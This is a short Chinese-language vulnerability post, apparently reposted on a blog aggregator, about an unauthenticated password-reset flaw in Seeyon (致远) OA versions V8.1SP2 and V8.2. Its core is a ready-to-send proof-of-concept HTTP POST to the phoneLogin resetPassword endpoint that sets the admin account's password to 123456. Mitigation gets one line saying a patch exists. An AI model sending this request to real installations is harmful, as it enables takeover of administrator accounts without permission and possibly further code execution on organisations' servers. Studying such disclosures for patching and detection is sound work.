2023 致远OA-任意用户密码重置漏洞

一、致远OA

        致远OA是一款企业级办公自动化软件,它提供了一系列的办公自动化解决方案,包括文档管理、流程管理、协同办公、知识管理、人力资源管理等功能。致远OA可以帮助企业实现信息化管理,提高工作效率和管理水平,同时也可以提高企业的竞争力。

二、漏洞描述

致远OA组件存在任意密码修改漏洞的信息,漏洞威胁等级:高危。该漏洞是由于致远OA修改用户密码时收发验证码的接口存在缺陷,攻击者可利用该漏洞在未授权的情况下,构造恶意数据执行未授权重置密码攻击,最终越权登录账号并可能进一步实现远程代码执行。
影响范围
V5/G6 V8.1SP2、V8.2

三、漏洞复现 

poc:

POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.667.76 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
Content-Length: 56

{"loginName":"admin","password":"123456"}

截图:

2023 致远OA-任意用户密码重置漏洞_第1张图片

四、修复建议 

致远官方已发布修复补丁

致远服务

你可能感兴趣的:(网络,安全)